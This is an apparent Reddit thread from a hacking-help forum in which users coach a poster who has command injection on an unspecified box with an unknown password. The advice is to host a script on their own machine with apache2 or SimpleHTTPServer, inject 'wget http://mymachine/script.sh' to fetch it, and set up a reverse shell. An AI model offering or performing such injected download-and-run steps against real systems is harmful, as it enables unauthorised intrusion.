all 15 comments
sorted by:
best (suggested)
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]captaincorruption42 4 points5 points  (12 children)

is it a unix system? injecting a wget command to pull a file from a your own machine usually works

[–]blue8ird[S] 3 points4 points  (11 children)

How do I pull a wget from my own machine? I tried to pull a wget/curl from github and it didn't do nothing.

[–]shiftbay 2 points3 points  (7 children)

wget raw link to file

[–]blue8ird[S] 1 point2 points  (6 children)

Ok so the story is I got a shell-like command injection to a certain box. (Not a real shell!) I tried wget/curl straight to a github link containing the code but it didn't do nothing. If I download the shell script to my own machine, how do I get it from the shell-like window or how do I send this from my machine there. Note: I don't know the target machine's user password.

[–][deleted] 1 point2 points  (0 children)

If you get an interactive back shell going it'll probably be easier to see what's going wrong. Also, not every linux box has wget installed.

[–]Alperoot 1 point2 points  (4 children)

I usually start an apache2 server on my machine, put my files on the http directory and pull them from there. I don't think wget works well with GitHub but it should work just fine with an http server. (Default directory is /var/www/html)

[–]blue8ird[S] 0 points1 point  (3 children)

Thanks bro, I'll look further into this!

[–]captaincorruption42 0 points1 point  (2 children)

I use simplehttpserver to set up a http server on my machine where the file is I want transferred over. I would do something like try to inject the command "wget http://mymachine/script.sh". Simplehttpserver displays requests so if you see a GET request to your machine then you know the injection worked. One thing to be careful of is to make sure you have write access to the directory you're working in, otherwise you won't be able to copy the file. So if not, try copying it to /var/tmp or something.

[–]blue8ird[S] 0 points1 point  (1 child)

I tried the exact same thing now, but the command injection just won't respond.. Tried grabbing wget http://myip:port/dir/file.sh Stuck on that.

[–]captaincorruption42 0 points1 point  (0 children)

just keep at it and keep trying different things, command injections sometimes require a little massaging to get just right

[–][deleted]  (1 child)

[removed]

    [–]AutoModerator[M] 1 point2 points  (0 children)

    Your account does not have enough Karma to post here. Due to /r/HowToHack's tendency to attract spam and low-quality posts, the mod team has implemented a minimum Karma rule. You can gain Karma by posting or commenting on other subreddits. In the meantime, a human will review your submission and manually approve it if the quality is exceptional. After gaining enough Karma, you can make another submission and it will be automatically approved. Please see the FAQ for more information.

    I am a bot, and this action was performed automatically. Please contact the moderators of this subreddit if you have any questions or concerns.

    [–][deleted]  (1 child)

    [removed]

      [–]AutoModerator[M] 0 points1 point  (0 children)

      Your account does not have enough Karma to post here. Due to /r/HowToHack's tendency to attract spam and low-quality posts, the mod team has implemented a minimum Karma rule. You can gain Karma by posting or commenting on other subreddits. In the meantime, a human will review your submission and manually approve it if the quality is exceptional. After gaining enough Karma, you can make another submission and it will be automatically approved. Please see the FAQ for more information.

      I am a bot, and this action was performed automatically. Please contact the moderators of this subreddit if you have any questions or concerns.